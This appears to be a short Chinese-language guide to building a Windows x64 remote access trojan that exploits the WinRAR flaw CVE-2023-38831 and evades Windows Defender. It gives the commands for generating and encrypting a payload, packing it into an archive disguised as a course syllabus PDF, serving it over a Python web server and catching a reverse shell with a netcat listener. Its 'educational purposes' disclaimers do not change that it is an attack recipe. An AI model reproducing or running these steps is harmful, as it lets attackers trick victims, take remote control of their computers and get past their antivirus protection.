利用 CVE-2023-38831(WinRAR < 6.23)和 Shellcode 利用技术开发 Windows x64 RAT,以绕过 Windows Defender。
警告:此信息仅用于教育目的。未经授权使用这些技术是非法且不道德的。
构造 Shellcode
51721.py 生成初始 Shellcode。修改并编译 Shellcode
加密可执行文件
decrypt_file.ps1 加密编译后的可执行文件:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
创建 WinRAR 压缩包
cve-2023-38831-exp-gen.py 创建压缩包:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
设置 Python 服务器用于文件下载
enc_main.exe 和 decrypt_file.ps1 的目录。python3 -m http.server 8000
准备监听反向 TCP Shell
nc -lnvp 4444
触发反向 TCP Shell
此信息仅用于教育目的。未经明确许可使用此利用技术是非法且不道德的。作者不对任何滥用此信息的行为承担责任。